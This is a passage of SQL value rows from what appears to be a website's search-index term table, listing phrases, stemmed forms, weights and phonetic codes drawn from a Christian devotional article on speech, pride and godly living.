(279027, 'scripture “not', 'scriptur “not', 0, 1, 1.4667, 'S613653', 1, '*'),
(279028, 'scripture “not to', 'scriptur “not to', 0, 1, 1.5667, 'S613653', 1, '*'),
(279029, 'scriptures concerning', 'scriptur concerning', 0, 1, 1.7, 'S6136252652', 1, '*'),
(279030, 'scriptures concerning your', 'scriptur concerning your', 0, 1, 1.8667, 'S61362526526', 1, '*'),
(279031, 'scriptures even', 'scriptur even', 0, 1, 1.5, 'S6136215', 1, '*'),
(279032, 'scriptures even david', 'scriptur even david', 0, 1, 1.7, 'S6136215313', 1, '*'),
(279033, 'secret sins', 'secret sins', 0, 1, 1.3667, 'S63252', 1, '*'),
(279034, 'secret sins and', 'secret sins and', 0, 1, 1.5, 'S6325253', 1, '*'),
(279035, 'seductive', 'seduct', 0, 0, 0.6, 'S3231', 1, '*'),
(279036, 'seductive rough', 'seduct rough', 0, 1, 1.5, 'S323162', 1, '*'),
(279037, 'seductive rough dirty', 'seduct rough dirty', 0, 1, 1.7, 'S323162363', 1, '*'),
(279038, 'seeing', 'see', 0, 0, 0.4, 'S520', 1, '*'),
(279039, 'seeing god\'s', 'see god', 0, 1, 1.4, 'S5232', 1, '*'),
(279040, 'seeing god\'s glory', 'see god glory', 0, 1, 1.6, 'S523246', 1, '*'),
(279041, 'seen in', 'seen in', 0, 1, 1.2333, 'S500', 2, '*'),
(279042, 'seen in james', 'seen in james', 0, 1, 1.4333, 'S5252', 1, '*'),
(279043, 'seen when', 'seen when', 0, 1, 1.3, 'S500', 1, '*'),
(279044, 'seen when god', 'seen when god', 0, 1, 1.4333, 'S523', 1, '*'),
(279045, 'selfish', 'selfish', 0, 0, 0.4667, 'S412', 1, '*'),
(279046, 'selfish love', 'selfish love', 0, 1, 1.4, 'S41241', 1, '*'),
(279047, 'selfish love that', 'selfish love that', 0, 1, 1.5667, 'S412413', 1, '*'),
(279048, 'selfless', 'selfless', 0, 0, 0.5333, 'S4142', 1, '*'),
(279049, 'selfless love', 'selfless love', 0, 1, 1.4333, 'S414241', 1, '*'),
(279050, 'selfless love and', 'selfless love and', 0, 1, 1.5667, 'S41424153', 1, '*'),
(279051, 'semi', 'semi', 0, 0, 0.2667, 'S500', 1, '*'),
(279052, 'semi quarter', 'semi quarter', 0, 1, 1.4, 'S52636', 1, '*'),
(279053, 'semi quarter three-quarter', 'semi quarter three-quarter', 0, 1, 1.8667, 'S52636362636', 1, '*'),
(279054, 'sense of confidence', 'sens of confidence', 0, 1, 1.6333, 'S521251352', 1, '*'),
(279055, 'sense of inferiority', 'sens of inferiority', 0, 1, 1.6667, 'S5215163', 1, '*'),
(279056, 'set of complex', 'set of complex', 0, 1, 1.4667, 'S3125142', 1, '*'),
(279057, 'set of rules', 'set of rules', 0, 1, 1.4, 'S31642', 1, '*'),
(279058, 'several times', 'sever times', 0, 1, 1.4333, 'S164352', 1, '*'),
(279059, 'several times in', 'sever times in', 0, 1, 1.5333, 'S1643525', 1, '*'),
(279060, 'sex', 'sex', 0, 0, 0.2, 'S000', 1, '*'),
(279061, 'sex rather', 'sex rather', 0, 1, 1.3333, 'S636', 1, '*'),
(279062, 'sex rather than', 'sex rather than', 0, 1, 1.5, 'S63635', 1, '*'),
(279063, 'she was doing', 'she was doing', 0, 1, 1.4333, 'S352', 1, '*'),
(279064, 'should be an', 'should be an', 0, 1, 1.4, 'S4315', 1, '*'),
(279065, 'should be ignored', 'should be ignored', 0, 1, 1.5667, 'S4312563', 1, '*'),
(279066, 'should be profitable', 'should be profitable', 0, 1, 1.6667, 'S43161314', 1, '*'),
(279067, 'should reflect', 'should reflect', 0, 1, 1.4667, 'S4361423', 1, '*'),
(279068, 'should reflect god\'s', 'should reflect god', 0, 1, 1.6667, 'S4361423232', 1, '*'),
(279069, 'should use', 'should use', 0, 1, 1.3333, 'S432', 1, '*'),
(279070, 'should use your', 'should use your', 0, 1, 1.5, 'S4326', 1, '*'),
(279071, 'shouldn\'t', 'shouldn', 0, 0, 0.6, 'S4353', 1, '*'),
(279072, 'shouldn\'t be', 'shouldn be', 0, 1, 1.4, 'S43531', 1, '*'),
(279073, 'shouldn\'t be found', 'shouldn be found', 0, 1, 1.6, 'S4353153', 1, '*'),
(279074, 'show them', 'show them', 0, 1, 1.3, 'S350', 1, '*'),
(279075, 'show them through', 'show them through', 0, 1, 1.5667, 'S35362', 1, '*'),
(279076, 'showcase', 'showcas', 0, 0, 0.5333, 'S000', 1, '*'),
(279077, 'showcase that', 'showcas that', 0, 1, 1.4333, 'S300', 1, '*'),
(279078, 'showcase that kind', 'showcas that kind', 0, 1, 1.6, 'S3253', 1, '*'),
(279079, 'showed two', 'show two', 0, 1, 1.3333, 'S300', 1, '*'),
(279080, 'showed two very', 'show two very', 0, 1, 1.5, 'S316', 1, '*'),
(279081, 'sins and', 'sin and', 0, 1, 1.2667, 'S5253', 1, '*'),
(279082, 'sins and unbroken', 'sin and unbroken', 0, 1, 1.5667, 'S525351625', 1, '*'),
(279083, 'sins of', 'sin of', 0, 1, 1.2333, 'S521', 1, '*'),
(279084, 'sins of all', 'sin of all', 0, 1, 1.3667, 'S5214', 1, '*'),
(279085, 'situation by', 'situat by', 0, 1, 1.4, 'S351', 1, '*'),
(279086, 'situation by confessing', 'situat by confessing', 0, 1, 1.7667, 'S351251252', 1, '*'),
(279087, 'situation in', 'situat in', 0, 1, 1.4, 'S350', 1, '*'),
(279088, 'situation in which', 'situat in which', 0, 1, 1.6, 'S352', 1, '*'),
(279089, 'situation instead', 'situat instead', 0, 1, 1.5667, 'S3523', 1, '*'),
(279090, 'situation instead of', 'situat instead of', 0, 1, 1.6667, 'S35231', 1, '*'),
(279091, 'situations you', 'situat you', 0, 1, 1.4667, 'S352', 1, '*'),
(279092, 'situations you find', 'situat you find', 0, 1, 1.6333, 'S352153', 1, '*'),
(279093, 'slangs', 'slang', 0, 0, 0.4, 'S452', 1, '*'),
(279094, 'slangs and', 'slang and', 0, 1, 1.3333, 'S45253', 1, '*'),
(279095, 'slangs and swear', 'slang and swear', 0, 1, 1.5333, 'S4525326', 1, '*'),
(279096, 'so contaminated', 'so contaminated', 0, 1, 1.5, 'S5353', 1, '*'),
(279097, 'so contaminated by', 'so contaminated by', 0, 1, 1.6, 'S53531', 1, '*'),
(279098, 'so watch', 'so watch', 0, 1, 1.2667, 'S320', 1, '*'),
(279099, 'so watch your', 'so watch your', 0, 1, 1.4333, 'S326', 1, '*'),
(279100, 'soberly.”', 'soberly.”', 0, 0, 0.6, 'S164', 1, '*'),
(279101, 'soberly.” you', 'soberly.” you', 0, 1, 1.4333, 'S164', 1, '*'),
(279102, 'soberly.” you probably', 'soberly.” you probably', 0, 1, 1.7333, 'S1641614', 1, '*'),
(279103, 'some spiritual', 'some spiritual', 0, 1, 1.4667, 'S521634', 1, '*'),
(279104, 'some spiritual sources', 'some spiritual sources', 0, 1, 1.7333, 'S521634262', 1, '*'),
(279105, 'son to', 'son to', 0, 1, 1.2, 'S530', 1, '*'),
(279106, 'son to die', 'son to die', 0, 1, 1.3333, 'S530', 1, '*'),
(279107, 'sorts', 'sort', 0, 0, 0.3333, 'S632', 1, '*'),
(279108, 'sorts of', 'sort of', 0, 1, 1.2667, 'S6321', 1, '*'),
(279109, 'sorts of frustrating', 'sort of frustrating', 0, 1, 1.6667, 'S63216236352', 1, '*'),
(279110, 'sounds like', 'sound like', 0, 1, 1.3667, 'S53242', 1, '*'),
(279111, 'sounds like a', 'sound like a', 0, 1, 1.4333, 'S53242', 1, '*'),
(279112, 'sounds thinking', 'sound thinking', 0, 1, 1.5, 'S53235252', 1, '*'),
(279113, 'sounds thinking like', 'sound thinking like', 0, 1, 1.6667, 'S5323525242', 1, '*'),
(279114, 'sources', 'sourc', 0, 0, 0.4667, 'S620', 1, '*'),
(279115, 'sources with', 'sourc with', 0, 1, 1.4, 'S623', 1, '*'),
(279116, 'sources with practices', 'sourc with practices', 0, 1, 1.7333, 'S62316232', 1, '*'),
(279117, 'special and', 'special and', 0, 1, 1.3667, 'S12453', 1, '*'),
(279118, 'special and he', 'special and he', 0, 1, 1.4667, 'S12453', 1, '*'),
(279119, 'special be', 'special be', 0, 1, 1.3333, 'S1241', 1, '*'),
(279120, 'special be careful', 'special be careful', 0, 1, 1.6, 'S12412614', 1, '*'),
(279121, 'speech', 'speech', 0, 0, 0.4, 'S120', 1, '*'),
(279122, 'speech a', 'speech a', 0, 1, 1.2667, 'S120', 1, '*'),
(279123, 'speech a lot', 'speech a lot', 0, 1, 1.4, 'S1243', 1, '*'),
(279124, 'speech must', 'speech must', 0, 1, 1.3667, 'S12523', 1, '*'),
(279125, 'speech must consistently', 'speech must consistently', 0, 1, 1.8, 'S125232523534', 1, '*'),
(279126, 'spiritual duties', 'spiritu duties', 0, 1, 1.5333, 'S163432', 1, '*'),
(279127, 'spiritual duties of', 'spiritu duties of', 0, 1, 1.6333, 'S1634321', 1, '*'),
(279128, 'spiritual life and', 'spiritu life and', 0, 1, 1.6, 'S1634153', 1, '*'),
(279129, 'spiritual sources', 'spiritu sources', 0, 1, 1.5667, 'S1634262', 1, '*'),
(279130, 'spiritual sources with', 'spiritu sources with', 0, 1, 1.7333, 'S16342623', 1, '*'),
(279131, 'stand in', 'stand in', 0, 1, 1.2667, 'S3535', 1, '*'),
(279132, 'stand in your', 'stand in your', 0, 1, 1.4333, 'S35356', 1, '*'),
(279133, 'start speaking in', 'start speaking in', 0, 1, 1.5667, 'S363212525', 1, '*'),
(279134, 'start thinking', 'start thinking', 0, 1, 1.4667, 'S3635252', 1, '*'),
(279135, 'start thinking like', 'start thinking like', 0, 1, 1.6333, 'S363525242', 1, '*'),
(279136, 'statement in', 'statement in', 0, 1, 1.4, 'S3535', 1, '*'),
(279137, 'statement in the', 'statement in the', 0, 1, 1.5333, 'S35353', 1, '*'),
(279138, 'step into pride', 'step into pride', 0, 1, 1.5, 'S3153163', 1, '*'),
(279139, 'steps when', 'step when', 0, 1, 1.3333, 'S3125', 1, '*'),
(279140, 'steps when all', 'step when all', 0, 1, 1.4667, 'S31254', 1, '*'),
(279141, 'still have a', 'still have a', 0, 1, 1.4, 'S341', 1, '*'),
(279142, 'stop you', 'stop you', 0, 1, 1.2667, 'S310', 1, '*'),
(279143, 'stop you from', 'stop you from', 0, 1, 1.4333, 'S3165', 1, '*'),
(279144, 'story is', 'stori is', 0, 1, 1.2667, 'S362', 1, '*'),
(279145, 'story is that', 'stori is that', 0, 1, 1.4333, 'S3623', 1, '*'),
(279146, 'story of mary', 'stori of mary', 0, 1, 1.4333, 'S36156', 1, '*'),
(279147, 'subtitle', 'subtitl', 0, 0, 0.5333, 'S134', 1, '*'),
(279148, 'subtitle the', 'subtitl the', 0, 1, 1.4, 'S1343', 1, '*'),
(279149, 'subtitle the ideal', 'subtitl the ideal', 0, 1, 1.6, 'S13434', 1, '*'),
(279150, 'successful christian', 'success christian', 0, 1, 1.6667, 'S1426235', 1, '*'),
(279151, 'successful christian is', 'success christian is', 0, 1, 1.7667, 'S14262352', 1, '*'),
(279152, 'such as secret', 'such as secret', 0, 1, 1.4667, 'S630', 1, '*'),
(279153, 'swear', 'swear', 0, 0, 0.3333, 'S600', 1, '*'),
(279154, 'swear wordsthat', 'swear wordsthat', 0, 1, 1.5, 'S6323', 1, '*'),
(279155, 'swear wordsthat worldly', 'swear wordsthat worldly', 0, 1, 1.7667, 'S63236434', 1, '*'),
(279156, 'take a look', 'take a look', 0, 1, 1.3667, 'T242', 1, '*'),
(279157, 'take note however', 'take note however', 0, 1, 1.5667, 'T25316', 1, '*'),
(279158, 'takes is', 'take is', 0, 1, 1.2667, 'T200', 1, '*'),
(279159, 'takes is to', 'take is to', 0, 1, 1.3667, 'T230', 1, '*'),
(279160, 'talk god', 'talk god', 0, 1, 1.2667, 'T423', 1, '*'),
(279161, 'talk god doesn\'t', 'talk god doesn', 0, 1, 1.5333, 'T423253', 1, '*'),
(279162, 'talk like', 'talk like', 0, 1, 1.3, 'T4242', 1, '*'),
(279163, 'talk like god', 'talk like god', 0, 1, 1.4333, 'T42423', 1, '*'),
(279164, 'talking like', 'talk like', 0, 1, 1.4, 'T425242', 1, '*'),
(279165, 'talking like god', 'talk like god', 0, 1, 1.5333, 'T4252423', 1, '*'),
(279166, 'tell from', 'tell from', 0, 1, 1.3, 'T4165', 1, '*'),
(279167, 'tell from their', 'tell from their', 0, 1, 1.5, 'T416536', 1, '*'),
(279168, 'tell themselves', 'tell themselves', 0, 1, 1.5, 'T4352412', 1, '*'),
(279169, 'tell themselves that', 'tell themselves that', 0, 1, 1.6667, 'T43524123', 1, '*'),
(279170, 'tell you directly', 'tell you directly', 0, 1, 1.5667, 'T436234', 1, '*'),
(279171, 'ten', 'ten', 0, 0, 0.2, 'T500', 2, '*'),
(279172, 'ten commandments', 'ten commandments', 0, 1, 1.5333, 'T5253532', 1, '*'),
(279173, 'ten commandments and', 'ten commandments and', 0, 1, 1.6667, 'T525353253', 1, '*'),
(279174, 'tend', 'tend', 0, 0, 0.2667, 'T530', 2, '*'),
(279175, 'tend to', 'tend to', 0, 1, 1.2333, 'T530', 2, '*'),
(279176, 'tend to believe', 'tend to believe', 0, 1, 1.5, 'T53141', 1, '*'),
(279177, 'tend to complicate', 'tend to complicate', 0, 1, 1.6, 'T53251423', 1, '*'),
(279178, 'than he', 'than he', 0, 1, 1.2333, 'T500', 1, '*'),
(279179, 'than he ought', 'than he ought', 0, 1, 1.4333, 'T523', 1, '*'),
(279180, 'than seeing', 'than seeing', 0, 1, 1.3667, 'T5252', 1, '*'),
(279181, 'than seeing god\'s', 'than seeing god', 0, 1, 1.5667, 'T525232', 1, '*'),
(279182, 'than you', 'than you', 0, 1, 1.2667, 'T500', 1, '*'),
(279183, 'than you ought', 'than you ought', 0, 1, 1.4667, 'T523', 1, '*'),
(279184, 'thanjust', 'thanjust', 0, 0, 0.5333, 'T523', 1, '*'),
(279185, 'thanjust obeying', 'thanjust obeying', 0, 1, 1.5333, 'T523152', 1, '*'),
(279186, 'thanjust obeying a', 'thanjust obeying a', 0, 1, 1.6, 'T523152', 1, '*'),
(279187, 'that all those', 'that all those', 0, 1, 1.4667, 'T432', 1, '*'),
(279188, 'that all you', 'that all you', 0, 1, 1.4, 'T400', 1, '*'),
(279189, 'that allowing', 'that allowing', 0, 1, 1.4333, 'T452', 1, '*'),
(279190, 'that allowing you', 'that allowing you', 0, 1, 1.5667, 'T452', 1, '*'),
(279191, 'that are not', 'that are not', 0, 1, 1.4, 'T653', 1, '*'),
(279192, 'that be', 'that be', 0, 1, 1.2333, 'T100', 1, '*'),
(279193, 'that be not', 'that be not', 0, 1, 1.3667, 'T153', 1, '*'),
(279194, 'that by', 'that by', 0, 1, 1.2333, 'T100', 1, '*'),
(279195, 'that by putting', 'that by putting', 0, 1, 1.5, 'T1352', 1, '*'),
(279196, 'that gives the', 'that gives the', 0, 1, 1.4667, 'T2123', 1, '*'),
(279197, 'that god made', 'that god made', 0, 1, 1.4333, 'T2353', 1, '*'),
(279198, 'that if mary', 'that if mary', 0, 1, 1.4, 'T156', 1, '*'),
(279199, 'that instead', 'that instead', 0, 1, 1.4, 'T523', 1, '*'),
(279200, 'that instead of', 'that instead of', 0, 1, 1.5, 'T5231', 1, '*'),
(279201, 'that kind', 'that kind', 0, 1, 1.3, 'T253', 1, '*'),
(279202, 'that kind of', 'that kind of', 0, 1, 1.4, 'T2531', 1, '*'),
(279203, 'that leads', 'that leads', 0, 1, 1.3333, 'T432', 1, '*'),
(279204, 'that leads to', 'that leads to', 0, 1, 1.4333, 'T4323', 1, '*'),
(279205, 'that mary wasn\'t', 'that mary wasn', 0, 1, 1.5333, 'T56253', 1, '*'),
(279206, 'that means', 'that means', 0, 1, 1.3333, 'T520', 1, '*'),
(279207, 'that means we', 'that means we', 0, 1, 1.4333, 'T520', 1, '*'),
(279208, 'that prioritized', 'that prioritized', 0, 1, 1.5333, 'T16323', 1, '*'),
(279209, 'that prioritized her', 'that prioritized her', 0, 1, 1.6667, 'T163236', 1, '*'),
(279210, 'that privilege', 'that privilege', 0, 1, 1.4667, 'T16142', 1, '*'),
(279211, 'that privilege to', 'that privilege to', 0, 1, 1.5667, 'T161423', 1, '*'),
(279212, 'that the bible', 'that the bible', 0, 1, 1.4667, 'T140', 2, '*'),
(279213, 'that they tend', 'that they tend', 0, 1, 1.4667, 'T530', 1, '*'),
(279214, 'that this', 'that this', 0, 1, 1.3, 'T200', 1, '*'),
(279215, 'that this is', 'that this is', 0, 1, 1.4, 'T200', 1, '*'),
(279216, 'that this point', 'that this point', 0, 1, 1.5, 'T2153', 1, '*'),
(279217, 'that unless', 'that unless', 0, 1, 1.3667, 'T542', 1, '*'),
(279218, 'that unless they', 'that unless they', 0, 1, 1.5333, 'T5423', 1, '*'),
(279219, 'that we\'ve', 'that we', 0, 1, 1.3333, 'T100', 1, '*'),
(279220, 'that we\'ve dealt', 'that we dealt', 0, 1, 1.5333, 'T1343', 1, '*'),
(279221, 'that when it', 'that when it', 0, 1, 1.4, 'T530', 1, '*'),
(279222, 'that you can\'t', 'that you can', 0, 1, 1.4667, 'T253', 1, '*'),
(279223, 'that you don\'t', 'that you don', 0, 1, 1.4667, 'T530', 1, '*'),
(279224, 'that you know', 'that you know', 0, 1, 1.4333, 'T250', 3, '*'),
(279225, 'that\'s another', 'that another', 0, 1, 1.4667, 'T2536', 1, '*'),
(279226, 'that\'s another danger', 'that another danger', 0, 1, 1.7, 'T25363526', 1, '*'),
(279227, 'the bible didn\'t', 'the bible didn', 0, 1, 1.5333, 'T14353', 1, '*'),
(279228, 'the bible for', 'the bible for', 0, 1, 1.4333, 'T1416', 2, '*'),
(279229, 'the bible you', 'the bible you', 0, 1, 1.4333, 'T140', 1, '*'),
(279230, 'the christian that', 'the christian that', 0, 1, 1.6, 'T262353', 1, '*'),
(279231, 'the closer', 'the closer', 0, 1, 1.3333, 'T2426', 1, '*'),
(279232, 'the closer you', 'the closer you', 0, 1, 1.4667, 'T2426', 1, '*'),
(279233, 'the confession', 'the confession', 0, 1, 1.4667, 'T25125', 1, '*'),
(279234, 'the confession of', 'the confession of', 0, 1, 1.5667, 'T251251', 1, '*'),
(279235, 'the cost', 'the cost', 0, 1, 1.2667, 'T230', 1, '*'),
(279236, 'the cost of', 'the cost of', 0, 1, 1.3667, 'T231', 1, '*'),
(279237, 'the danger', 'the danger', 0, 1, 1.3333, 'T526', 2, '*'),
(279238, 'the danger of', 'the danger of', 0, 1, 1.4333, 'T5261', 1, '*'),
(279239, 'the danger that', 'the danger that', 0, 1, 1.5, 'T5263', 1, '*'),
(279240, 'the devil a', 'the devil a', 0, 1, 1.3667, 'T140', 1, '*'),
(279241, 'the devil an', 'the devil an', 0, 1, 1.4, 'T145', 1, '*'),
(279242, 'the devil away', 'the devil away', 0, 1, 1.4667, 'T140', 1, '*'),
(279243, 'the devil knows', 'the devil knows', 0, 1, 1.5, 'T14252', 2, '*'),
(279244, 'the devil lastly', 'the devil lastly', 0, 1, 1.5333, 'T14234', 1, '*'),
(279245, 'the devil they', 'the devil they', 0, 1, 1.4667, 'T143', 1, '*'),
(279246, 'the devil you', 'the devil you', 0, 1, 1.4333, 'T140', 1, '*'),
(279247, 'the easiest challenges', 'the easiest challenges', 0, 1, 1.7333, 'T232452', 1, '*'),
(279248, 'the farther', 'the farther', 0, 1, 1.3667, 'T1636', 1, '*'),
(279249, 'the farther you', 'the farther you', 0, 1, 1.5, 'T1636', 1, '*'),
(279250, 'the following i', 'the following i', 0, 1, 1.5, 'T1452', 1, '*'),
(279251, 'the food', 'the food', 0, 1, 1.2667, 'T130', 1, '*'),
(279252, 'the food and', 'the food and', 0, 1, 1.4, 'T1353', 1, '*'),
(279253, 'the funny', 'the funny', 0, 1, 1.3, 'T150', 1, '*'),
(279254, 'the funny thing', 'the funny thing', 0, 1, 1.5, 'T15352', 1, '*'),
(279255, 'the glorious', 'the glorious', 0, 1, 1.4, 'T2462', 1, '*'),
(279256, 'the glorious experiences', 'the glorious experiences', 0, 1, 1.8, 'T24621652', 1, '*'),
(279257, 'the glorious opportunity', 'the glorious opportunity', 0, 1, 1.8, 'T246216353', 1, '*'),
(279258, 'the ideal', 'the ideal', 0, 1, 1.3, 'T400', 1, '*'),
(279259, 'the ideal lifestyle', 'the ideal lifestyle', 0, 1, 1.6333, 'T41234', 1, '*'),
(279260, 'the lesson', 'the lesson', 0, 1, 1.3333, 'T425', 1, '*'),
(279261, 'the lesson behind', 'the lesson behind', 0, 1, 1.5667, 'T425153', 1, '*'),
(279262, 'the lifestyle', 'the lifestyle', 0, 1, 1.4333, 'T41234', 1, '*'),
(279263, 'the lifestyle of', 'the lifestyle of', 0, 1, 1.5333, 'T412341', 1, '*'),
(279264, 'the main', 'the main', 0, 1, 1.2667, 'T500', 1, '*'),
(279265, 'the main thing', 'the main thing', 0, 1, 1.4667, 'T5352', 1, '*'),
(279266, 'the manner', 'the manner', 0, 1, 1.3333, 'T560', 1, '*'),
(279267, 'the manner consistent', 'the manner consistent', 0, 1, 1.7, 'T56252353', 1, '*'),
(279268, 'the manner god', 'the manner god', 0, 1, 1.4667, 'T5623', 1, '*'),
(279269, 'the master speak', 'the master speak', 0, 1, 1.5333, 'T5236212', 1, '*'),
(279270, 'the outcome', 'the outcome', 0, 1, 1.3667, 'T250', 1, '*'),
(279271, 'the outcome of', 'the outcome of', 0, 1, 1.4667, 'T251', 1, '*'),
(279272, 'the pharisees several', 'the pharisees several', 0, 1, 1.7, 'T162164', 1, '*'),
(279273, 'the point at', 'the point at', 0, 1, 1.4, 'T153', 1, '*'),
(279274, 'the proud', 'the proud', 0, 1, 1.3, 'T163', 1, '*'),
(279275, 'the proud also', 'the proud also', 0, 1, 1.4667, 'T16342', 1, '*'),
(279276, 'the religious', 'the religious', 0, 1, 1.4333, 'T642', 1, '*'),
(279277, 'the religious christian', 'the religious christian', 0, 1, 1.7667, 'T6426235', 1, '*'),
(279278, 'the right way', 'the right way', 0, 1, 1.4333, 'T623', 1, '*'),
(279279, 'the role', 'the role', 0, 1, 1.2667, 'T640', 1, '*'),
(279280, 'the role of', 'the role of', 0, 1, 1.3667, 'T641', 1, '*'),
(279281, 'the scriptures concerning', 'the scriptures concerning', 0, 1, 1.8333, 'T26136252652', 1, '*'),
(279282, 'the scriptures even', 'the scriptures even', 0, 1, 1.6333, 'T26136215', 1, '*'),
(279283, 'the sins', 'the sins', 0, 1, 1.2667, 'T252', 1, '*'),
(279284, 'the sins of', 'the sins of', 0, 1, 1.3667, 'T2521', 1, '*'),
(279285, 'the situation', 'the situation', 0, 1, 1.4333, 'T235', 2, '*'),
(279286, 'the situation by', 'the situation by', 0, 1, 1.5333, 'T2351', 1, '*'),
(279287, 'the spiritual duties', 'the spiritual duties', 0, 1, 1.6667, 'T2163432', 1, '*'),
(279288, 'the story', 'the story', 0, 1, 1.3, 'T236', 1, '*'),
(279289, 'the story of', 'the story of', 0, 1, 1.4, 'T2361', 1, '*'),
(279290, 'the ten', 'the ten', 0, 1, 1.2333, 'T500', 1, '*'),
(279291, 'the ten commandments', 'the ten commandments', 0, 1, 1.6667, 'T5253532', 1, '*'),
(279292, 'the three', 'the three', 0, 1, 1.3, 'T600', 1, '*'),
(279293, 'the three things', 'the three things', 0, 1, 1.5333, 'T6352', 1, '*'),
(279294, 'the time should', 'the time should', 0, 1, 1.5, 'T5243', 1, '*'),
(279295, 'the toughest', 'the toughest', 0, 1, 1.4, 'T230', 1, '*'),
(279296, 'the toughest of', 'the toughest of', 0, 1, 1.5, 'T231', 1, '*'),
(279297, 'the world take', 'the world take', 0, 1, 1.4667, 'T6432', 1, '*'),
(279298, 'the world your', 'the world your', 0, 1, 1.4667, 'T6436', 1, '*'),
(279299, 'their manner', 'their manner', 0, 1, 1.4, 'T656', 1, '*'),
(279300, 'their manner of', 'their manner of', 0, 1, 1.5, 'T6561', 1, '*'),
(279301, 'their own freewill', 'their own freewill', 0, 1, 1.6, 'T65164', 1, '*'),
(279302, 'them at', 'them at', 0, 1, 1.2333, 'T530', 1, '*'),
(279303, 'them at once', 'them at once', 0, 1, 1.4, 'T5352', 1, '*'),
(279304, 'them carefully', 'them carefully', 0, 1, 1.4667, 'T52614', 1, '*'),
(279305, 'them carefully the', 'them carefully the', 0, 1, 1.6, 'T526143', 1, '*'),
(279306, 'them in person', 'them in person', 0, 1, 1.4667, 'T51625', 1, '*'),
(279307, 'them showed', 'them showed', 0, 1, 1.3667, 'T523', 1, '*'),
(279308, 'them showed two', 'them showed two', 0, 1, 1.5, 'T523', 1, '*'),
(279309, 'them through', 'them through', 0, 1, 1.4, 'T5362', 1, '*'),
(279310, 'them through the', 'them through the', 0, 1, 1.5333, 'T53623', 1, '*'),
(279311, 'them use', 'them use', 0, 1, 1.2667, 'T520', 1, '*'),
(279312, 'them use foul', 'them use foul', 0, 1, 1.4333, 'T5214', 1, '*'),
(279313, 'themselves that', 'themselv that', 0, 1, 1.5, 'T524123', 1, '*'),
(279314, 'themselves that all', 'themselv that all', 0, 1, 1.6333, 'T5241234', 1, '*'),
(279315, 'there is hope', 'there is hope', 0, 1, 1.4333, 'T621', 1, '*'),
(279316, 'therefore choose', 'therefor choose', 0, 1, 1.5333, 'T6162', 1, '*'),
(279317, 'therefore choose them', 'therefor choose them', 0, 1, 1.7, 'T616235', 1, '*'),
(279318, 'they are actually', 'thei are actually', 0, 1, 1.5667, 'T6234', 1, '*'),
(279319, 'they are christians', 'thei are christians', 0, 1, 1.6333, 'T6262352', 1, '*'),
(279320, 'they tell', 'thei tell', 0, 1, 1.3, 'T400', 1, '*'),
(279321, 'they tell you', 'thei tell you', 0, 1, 1.4333, 'T400', 1, '*'),
(279322, 'they tend', 'thei tend', 0, 1, 1.3, 'T530', 1, '*'),
(279323, 'they tend to', 'thei tend to', 0, 1, 1.4, 'T530', 1, '*'),
(279324, 'they think', 'thei think', 0, 1, 1.3333, 'T520', 1, '*'),
(279325, 'they think they\'re', 'thei think they', 0, 1, 1.6, 'T5236', 1, '*'),
(279326, 'they were important', 'thei were important', 0, 1, 1.6333, 'T6516353', 1, '*'),
(279327, 'they were in', 'thei were in', 0, 1, 1.4, 'T650', 1, '*'),
(279328, 'they would have', 'thei would have', 0, 1, 1.5, 'T431', 1, '*'),
(279329, 'they\'re', 'thei', 0, 0, 0.4667, 'T600', 1, '*'),
(279330, 'they\'re pleasing', 'thei pleasing', 0, 1, 1.5333, 'T614252', 1, '*'),
(279331, 'they\'re pleasing god', 'thei pleasing god', 0, 1, 1.6667, 'T6142523', 1, '*'),
(279332, 'thing about people', 'thing about people', 0, 1, 1.6, 'T521314', 1, '*'),
(279333, 'thing about talking', 'thing about talking', 0, 1, 1.6333, 'T52134252', 1, '*'),
(279334, 'thing which', 'thing which', 0, 1, 1.3667, 'T520', 1, '*'),
(279335, 'thing which was', 'thing which was', 0, 1, 1.5, 'T520', 1, '*'),
(279336, 'thing you need', 'thing you need', 0, 1, 1.4667, 'T5253', 1, '*'),
(279337, 'things if', 'thing if', 0, 1, 1.3, 'T521', 1, '*'),
(279338, 'things if you\'re', 'thing if you', 0, 1, 1.5333, 'T5216', 1, '*'),
(279339, 'things she', 'thing she', 0, 1, 1.3333, 'T520', 1, '*'),
(279340, 'things she was', 'thing she was', 0, 1, 1.4667, 'T520', 1, '*'),
(279341, 'things that be', 'thing that be', 0, 1, 1.4667, 'T5231', 1, '*'),
(279342, 'things we looked', 'thing we looked', 0, 1, 1.5333, 'T52423', 1, '*'),
(279343, 'think but', 'think but', 0, 1, 1.3, 'T5213', 1, '*'),
(279344, 'think but to', 'think but to', 0, 1, 1.4, 'T5213', 1, '*'),
(279345, 'think highly', 'think highly', 0, 1, 1.4, 'T524', 1, '*'),
(279346, 'think highly of', 'think highly of', 0, 1, 1.5, 'T5241', 1, '*'),
(279347, 'think it', 'think it', 0, 1, 1.2667, 'T523', 1, '*'),
(279348, 'think it should', 'think it should', 0, 1, 1.5, 'T523243', 1, '*'),
(279349, 'think like', 'think like', 0, 1, 1.3333, 'T5242', 1, '*'),
(279350, 'think like god', 'think like god', 0, 1, 1.4667, 'T52423', 1, '*'),
(279351, 'think more', 'think more', 0, 1, 1.3333, 'T5256', 1, '*'),
(279352, 'think more highly', 'think more highly', 0, 1, 1.5667, 'T525624', 1, '*'),
(279353, 'think of himself', 'think of himself', 0, 1, 1.5333, 'T5215241', 1, '*'),
(279354, 'think of sex', 'think of sex', 0, 1, 1.4, 'T5212', 1, '*'),
(279355, 'think soberly.”', 'think soberly.”', 0, 1, 1.5, 'T52164', 1, '*'),
(279356, 'think soberly.” you', 'think soberly.” you', 0, 1, 1.6333, 'T52164', 1, '*'),
(279357, 'think they\'re', 'think they', 0, 1, 1.4333, 'T5236', 1, '*'),
(279358, 'think they\'re pleasing', 'think they pleasing', 0, 1, 1.7333, 'T523614252', 1, '*'),
(279359, 'thinking', 'think', 0, 0, 0.5333, 'T5252', 1, '*'),
(279360, 'thinking like', 'think like', 0, 1, 1.4333, 'T525242', 1, '*'),
(279361, 'thinking like god', 'think like god', 0, 1, 1.5667, 'T5252423', 1, '*'),
(279362, 'thinking like him', 'think like him', 0, 1, 1.5667, 'T5252425', 1, '*'),
(279363, 'thinking the', 'think the', 0, 1, 1.4, 'T52523', 1, '*'),
(279364, 'thinking the right', 'think the right', 0, 1, 1.6, 'T52523623', 1, '*'),
(279365, 'this is a', 'thi is a', 0, 1, 1.3, 'T200', 2, '*'),
(279366, 'this is not', 'thi is not', 0, 1, 1.3667, 'T253', 2, '*'),
(279367, 'this issue', 'thi issue', 0, 1, 1.3333, 'T200', 2, '*'),
(279368, 'this issue is', 'thi issue is', 0, 1, 1.4333, 'T200', 1, '*'),
